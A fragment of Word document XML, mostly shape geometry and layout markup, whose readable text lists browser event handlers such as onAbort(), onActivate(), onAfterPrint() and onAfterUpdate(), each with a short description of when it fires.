                              <a:gd name="T33" fmla="*/ T32 w 827"/>
                              <a:gd name="T34" fmla="+- 0 176 155"/>
                              <a:gd name="T35" fmla="*/ 176 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2756 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 827"/>
                              <a:gd name="T38" fmla="+- 0 316 155"/>
                              <a:gd name="T39" fmla="*/ 316 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2739 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 827"/>
                              <a:gd name="T42" fmla="+- 0 337 155"/>
                              <a:gd name="T43" fmla="*/ 337 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2735 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 827"/>
                              <a:gd name="T46" fmla="+- 0 337 155"/>
                              <a:gd name="T47" fmla="*/ 33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" name="Text Box 117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5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onAbort()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78" o:spid="_x0000_s1254" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.75pt;width:41.35pt;height:9.15pt;z-index:-17648128;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,155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">
                <v:shape id="Freeform 1180" o:spid="_x0000_s1255" style="position:absolute;left:1930;top:155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IMKMYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCQAzF78J+hyELXkSneli1Osq6IrsHL/5BPIZO&#10;bIudTOmMWr/95iB4S3gv7/0yX7auUndqQunZwHCQgCLOvC05N3A8bPoTUCEiW6w8k4EnBVguPjpz&#10;TK1/8I7u+5grCeGQooEixjrVOmQFOQwDXxOLdvGNwyhrk2vb4EPCXaVHSfKlHZYsDQXW9FNQdt3f&#10;nIHtap1PN6ffeNaj47R3Pa/QZjtjup/t9wxUpDa+za/rPyv4w7Hgyj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IMKMYAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m805,182r-784,l18,182,,161r,-3l,21,21,,805,r21,21l826,161r-17,21l805,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="805,337;21,337;18,337;0,316;0,313;0,176;21,155;805,155;826,176;826,316;809,337;805,337" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1179" o:spid="_x0000_s1256" type="#_x0000_t202" style="position:absolute;left:1930;top:155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W0xcMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0PyxS86cYe1KSuIsVCQSjGeOhxmh2T&#10;xexszG41/feuIHibx/ucxaq3jbhQ541jBZNxAoK4dNpwpeBQfI7mIHxA1tg4JgX/5GG1fBksMNPu&#10;yjld9qESMYR9hgrqENpMSl/WZNGPXUscuaPrLIYIu0rqDq8x3DbyLUmm0qLh2FBjSx81laf9n1Ww&#10;/uF8Y87fv7v8mJuiSBPeTk9KDV/79TuIQH14ih/uLx3nT2Yp3L+JJ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W0x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onAbort()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(when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>aborts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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loading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>image)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589"/>
          <w:tab w:val="left" w:pos="1590"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:left="1589" w:hanging="1302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6886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687070" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1174" name="Group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070" cy="116205"/>
                          <a:chOff x="1930" y="166"/>
                          <a:chExt cx="1082" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1175" name="Freeform 1177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1082" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2991 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1082"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1082"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1082"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1082"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1082"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1082"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1082"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2991 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1082"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3012 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1082"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3012 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1082"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2994 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1082"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2991 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1082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2" h="183">
                                <a:moveTo>
                                  <a:pt x="106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061" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1064" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="106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6" name="Text Box 117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108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onActivate()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75" o:spid="_x0000_s1257" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:54.1pt;height:9.15pt;z-index:-17647616;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166" coordsize="108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">
                <v:shape id="Freeform 1177" o:spid="_x0000_s1258" style="position:absolute;left:1930;top:166;width:1082;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="108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d/jMUA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYYTeNGtL22U1SluwFNqDVS/ehs3s&#10;ZnEzWZK4bv31piD0No/3OYvVYFvRkw+NYwWzaQaCuHS64VrBfree5CBCRNbYOiYFvxRgtRzdLbDQ&#10;7sw/1G9jLVIIhwIVmBi7QspQGrIYpq4jTlzlvMWYoK+l9nhO4baVD1n2LC02nBoMdvRuqDxuT1ZB&#10;bT/e7Pqrys33Hv3ltOnzx0Ol1P14eJ2DiDTEf/HN/anT/NnLE/x9k06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53+MxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m1061,182l21,182r-3,l,161r,-3l,21,21,,1061,r21,21l1082,161r-18,21l1061,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1061,348;21,348;18,348;0,327;0,324;0,187;21,166;1061,166;1082,187;1082,327;1064,348;1061,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1176" o:spid="_x0000_s1259" type="#_x0000_t202" style="position:absolute;left:1930;top:166;width:108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ogt8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0Pywi96cYeUo1uREoLQqE0xkOP0+wk&#10;WczOptlV03/fLQje5vE+Z7MdbScuNHjjWMFinoAgrpw23Cg4lm+zJQgfkDV2jknBL3nY5g+TDWba&#10;XbmgyyE0Ioawz1BBG0KfSemrliz6ueuJI1e7wWKIcGikHvAaw20nn5IklRYNx4YWe3ppqTodzlbB&#10;7ouLV/Pz8f1Z1IUpy1XC7+lJqcfpuFuDCDSGu/jm3us4f/Gcwv838QS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aILf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onActivate()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(when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>element)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757"/>
          <w:tab w:val="left" w:pos="1758"/>
        </w:tabs>
        <w:ind w:left="1757" w:hanging="1470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6937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795020" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1171" name="Group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5020" cy="116205"/>
                          <a:chOff x="1930" y="154"/>
                          <a:chExt cx="1252" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1172" name="Freeform 1174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1252" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3161 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1252"/>
                              <a:gd name="T2" fmla="+- 0 336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1252"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1252"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1252"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1252"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1252"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1252"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3161 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1252"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3182 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1252"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3182 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1252"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3164 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1252"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3161 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1252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52" h="183">
                                <a:moveTo>
                                  <a:pt x="123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231" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1234" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123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" name="Text Box 117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1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onAfterPrint()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72" o:spid="_x0000_s1260" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:62.6pt;height:9.15pt;z-index:-17647104;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154" coordsize="125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">
                <v:shape id="Freeform 1174" o:spid="_x0000_s1261" style="position:absolute;left:1930;top:154;width:1252;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="125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fCsEA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS4vCMBC+C/6HMMLeNK2CSjWKLgj2tKyP+9iMbbWZ&#10;dJuo9d9vBMHbfHzPmS9bU4k7Na60rCAeRCCIM6tLzhUc9pv+FITzyBory6TgSQ6Wi25njom2D/6l&#10;+87nIoSwS1BB4X2dSOmyggy6ga2JA3e2jUEfYJNL3eAjhJtKDqNoLA2WHBoKrOm7oOy6uxkFo3F7&#10;dBt9/jme0u2zXJs0/rukSn312tUMhKfWf8Rv91aH+fFkCK9vwgl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k3wrBAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m1231,182l21,182r-3,l,161r,-3l,21,21,,1231,r21,21l1252,161r-18,21l1231,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1231,336;21,336;18,336;0,315;0,312;0,175;21,154;1231,154;1252,175;1252,315;1234,336;1231,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1173" o:spid="_x0000_s1262" type="#_x0000_t202" style="position:absolute;left:1930;top:154;width:125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DL8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi91Y0t2BqziohCoSCN8eBxzE6S&#10;xexsmt1q+u/dQqG3ebzPyVaDbcWVem8cK5hOEhDEpdOGawXHYvf0BsIHZI2tY1LwQx5Wy9FDhql2&#10;N87pegi1iCHsU1TQhNClUvqyIYt+4jriyFWutxgi7Gupe7zFcNvK5ySZSYuGY0ODHW0aKi+Hb6tg&#10;feJ8a77258+8yk1RzBP+mF2UehwP6wWIQEP4F/+533WcP319gd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tgy/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onAfterPrint()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(activates</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>after</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>prints</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>previews</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>job)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842"/>
          <w:tab w:val="left" w:pos="1843"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:left="1842" w:hanging="1555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6988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848995" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1168" name="Group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8995" cy="116205"/>
                          <a:chOff x="1930" y="166"/>
                          <a:chExt cx="1337" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1169" name="Freeform 1171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1337" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3246 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1337"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1337"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1337"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1337"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1337"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1337"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1337"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3246 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1337"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3267 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1337"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3267 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1337"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3249 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1337"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3246 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1337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7" h="183">
                                <a:moveTo>
                                  <a:pt x="131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16" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1319" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131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" name="Text Box 117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133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onAfterUpdate()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9" o:spid="_x0000_s1263" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:66.85pt;height:9.15pt;z-index:-17646592;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166" coordsize="133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">
                <v:shape id="Freeform 1171" o:spid="_x0000_s1264" style="position:absolute;left:1930;top:166;width:1337;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="133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TWW8YA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywheim7iQW3qKlVbKPQgTUXobciO&#10;ydrsbMhuNfrr3YLQ2zze58yXna3FiVpvHCtIRwkI4sJpw6WC3dfbcAbCB2SNtWNScCEPy0XvYY6Z&#10;dmf+pFMeShFD2GeooAqhyaT0RUUW/cg1xJE7uNZiiLAtpW7xHMNtLcdJMpEWDceGChtaV1T85L9W&#10;wev3fpea40c3Ldf51swuj9fVhpQa9LuXZxCBuvAvvrvfdZyfTp7g75t4gl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TWW8YAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m1316,182l21,182r-3,l,161r,-3l,21,21,,1316,r21,21l1337,161r-18,21l1316,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1316,348;21,348;18,348;0,327;0,324;0,187;21,166;1316,166;1337,187;1337,327;1319,348;1316,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1170" o:spid="_x0000_s1265" type="#_x0000_t202" style="position:absolute;left:1930;top:166;width:133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8dWMYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF74X+h2UEb3VjD9pGV5HSQkEQY3rocZod&#10;k8XsbJrdavz3zkHobYb35r1vluvBt+pMfXSBDUwnGSjiKljHtYGv8uPpBVRMyBbbwGTgShHWq8eH&#10;JeY2XLig8yHVSkI45migSanLtY5VQx7jJHTEoh1D7zHJ2tfa9niRcN/q5yybaY+OpaHBjt4aqk6H&#10;P29g883Fu/vd/eyLY+HK8jXj7exkzHg0bBagEg3p33y//rSCP50Lv3wjI+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8dWM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onAfterUpdate()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(activates</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>after</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>updating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object)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2094"/>
          <w:tab w:val="left" w:pos="2096"/>
        </w:tabs>
        <w:spacing w:before="149"/>
        <w:ind w:left="2095" w:hanging="1808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040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98425</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1003300" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1165" name="Group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3300" cy="116205"/>
                          <a:chOff x="1930" y="155"/>
                          <a:chExt cx="1580" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1166" name="Freeform 1168"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="155"/>
                            <a:ext cx="1580" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3489 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1580"/>
                              <a:gd name="T2" fmla="+- 0 337 155"/>
                              <a:gd name="T3" fmla="*/ 337 h 183"/>
